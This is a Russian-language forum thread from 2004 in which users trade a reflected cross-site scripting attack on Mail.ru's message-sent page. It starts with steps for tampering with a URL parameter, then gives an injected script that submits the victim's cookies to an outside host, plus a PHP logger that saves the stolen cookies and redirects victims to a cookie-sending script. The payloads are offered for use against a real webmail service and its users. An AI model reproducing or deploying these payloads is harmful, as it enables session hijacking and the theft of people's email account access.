Для чрезмерно категоричных в отношении "100%-ного взлома за деньги" товарищей)) Чтобы проникунцца нужной атмосферой, повторяйте все по порядку. 1) заходим на http://mail.ru , вводим свой логин, домен (к примеру [email protected]), пароль и заходим в почту 2) Жмем "написать письмо". Адресатом указываем любой мэйл, можнол и самого себя - [email protected], и нажимаем "отправить". 3)Появляется страница с сообщением "ваше письмо для [email protected] (<ТЕМА> отправлно. 4) Смотрим в адресную строку браузера. Там много параметров, находим: ....&[email protected]&.... 5)меняем [email protected] на нудный mail'овский адрес и жмем ввод. 6)Смеемся вместе)) Думаю смысл вышеизложенной басни понятен))
там вроде все менять можно.. Я не силен в cgi-bug, поэтому не знаю, а вдруг что-то и посерьезнее можно сделать)
Да не думаю ... Правда в 2000 году, говорят, был один баг, позволяющий узнать секретный вопрос к любым ящикам ...
про взлом в 2000-ном читал), у меня еще тогда в помине компа не было.. там другого плана. В скрытом поле пароль почему-то передавался, даже если на серкетный вопрос не правил ньо ответишь. А здесь, я имел ввиду, что вдруг можно внедрить какую-нибудь команду) JS можно же вставлять, попробуй user=< script>alrt()</script>
не знаю, может уже знаете давно: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://www.mail.ru/sendmsgok?Subject=KPbIC&From=&[email protected]&TotalUnread=Куча&ReturnPath=win.mail.ru/session/&To=<Form%20name=mailru%20Action="http://mbm.gratis.kg/mail.php"%20Method="POST"><input%20type=hidden%20name=param> </Form> < script> mailru.param.value=document.cookie;mailru.submit();</Script> [/QUOTE]<span id='postcolor'> потом http://mbm.gratis.kg/cookie
ну да, вот то же скриптик: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><? if($cookie){ $open=fopen('cookie.htm','a+'); fwrite($open,"<li>".$cookie."<br>"); fclose($open); Header("Location: http://www.mail.ru"); } else{ Header("Location: http://www.mail.ru/sendmsgok?Subject=fun&From=anyname&[email protected]&TotalUnread=0&ReturnPath=win.mail.ru/session/&To=< script>document.location.href=\"http://yourhomepage.ru/test/cookie.php?cookie=\"+document.cookie;</script>"); } ?>[/QUOTE]<span id='postcolor'> только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mynhauzen @ июня 16 2004,09:57)</td></tr><tr><td id="QUOTE">только что толку от этого? я так и не понял... ну есть у меня кукисы чужие, и что дальше?[/QUOTE]<span id='postcolor'> Надо у Алгола спросить, он в этом хорошо разбирается, видишь, пишет что в этих куках пароля нет. Да и вообще, навряд ли ты сделаешь что -нибудь, если ты не знал, куки тоже не будут рабочими, если нажата кнопка "выход". В конце-концов, поэксперементируй со своими файлами
